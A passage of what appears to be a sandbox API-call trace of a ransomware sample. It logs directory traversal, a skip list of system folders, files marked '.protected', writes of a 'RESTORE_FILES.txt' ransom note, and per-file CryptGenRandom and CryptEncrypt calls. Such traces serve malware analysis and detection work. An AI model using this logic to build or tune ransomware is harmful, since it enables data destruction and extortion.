(in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt") returned 64 [0093.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.104] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.105] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.105] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.105] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\RESTORE_FILES.txt") returned 50 [0093.105] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.105] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.105] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.105] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.105] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\RESTORE_FILES.txt") returned 50 [0093.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.106] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.106] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\RESTORE_FILES.txt") returned 46 [0093.106] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.106] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.106] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.106] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.106] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\RESTORE_FILES.txt") returned 46 [0093.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.106] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0093.106] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data") returned 39 [0093.106] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0093.106] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0093.106] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data\\*") returned 41 [0093.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.106] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0093.106] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop") returned 30 [0093.106] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0093.107] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0093.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop\\*") returned 32 [0093.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.107] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0093.107] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents") returned 32 [0093.107] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0093.107] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0093.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents\\*") returned 34 [0093.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.107] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0093.107] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Favorites") returned 32 [0093.107] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0093.107] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0093.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Favorites\\*") returned 34 [0093.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.107] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0093.107] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft") returned 32 [0093.107] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0093.108] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0093.108] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\*") returned 34 [0093.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.108] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.108] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.108] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.108] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.108] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.108] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\.") returned 34 [0093.108] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.108] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.108] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.108] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.108] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\." (normalized: "c:\\users\\all users\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.108] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.108] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.108] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.108] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.108] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.108] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.108] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\..") returned 35 [0093.108] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.108] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.108] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.108] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.108] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.108] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\.." (normalized: "c:\\users\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.108] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.108] lstrcmpiW (lpString1="Assistance", lpString2="Windows") returned -1 [0093.108] lstrcmpiW (lpString1="Assistance", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1="Assistance", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1="Assistance", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1="Assistance", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned 43 [0093.109] lstrcmpW (lpString1="Assistance", lpString2=".") returned 1 [0093.109] lstrcmpW (lpString1="Assistance", lpString2="..") returned 1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*") returned 45 [0093.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.109] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.109] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\.") returned 45 [0093.109] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.109] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.109] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.109] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\..") returned 46 [0093.109] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.109] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.109] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="Windows") returned -1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned 50 [0093.110] lstrcmpW (lpString1="Client", lpString2=".") returned 1 [0093.110] lstrcmpW (lpString1="Client", lpString2="..") returned 1 [0093.110] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*") returned 52 [0093.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.110] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.110] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.110] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.110] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.110] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.110] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\.") returned 52 [0093.110] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.110] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.110] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.110] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.110] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.111] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.111] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\..") returned 53 [0093.111] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.111] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.111] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="Windows") returned -1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="Program Files") returned -1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="$Recycle.bin") returned 1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="System Volume Information") returned -1 [0093.111] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned 54 [0093.111] lstrcmpW (lpString1="1.0", lpString2=".") returned 1 [0093.111] lstrcmpW (lpString1="1.0", lpString2="..") returned 1 [0093.111] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*") returned 56 [0093.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.111] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.111] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.111] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.111] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.111] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\.") returned 56 [0093.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.111] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.111] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.112] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\..") returned 57 [0093.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.112] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.112] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 60 [0093.112] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.112] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.112] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned 62 [0093.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.112] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.112] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.112] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.112] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.112] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\.") returned 62 [0093.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.112] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\..") returned 63 [0093.113] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.113] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.protected") returned 90 [0093.113] StrStrIW (lpFirst="Help_CValidator.H1D.protected", lpSrch=".protected") returned=".protected" [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.protected") returned 92 [0093.113] StrStrIW (lpFirst="Help_MKWD_AssetId.H1W.protected", lpSrch=".protected") returned=".protected" [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.protected") returned 92 [0093.113] StrStrIW (lpFirst="Help_MKWD_BestBet.H1W.protected", lpSrch=".protected") returned=".protected" [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.protected") returned 89 [0093.114] StrStrIW (lpFirst="Help_MTOC_help.H1H.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="Program Files") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="Program Files (x86)") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: 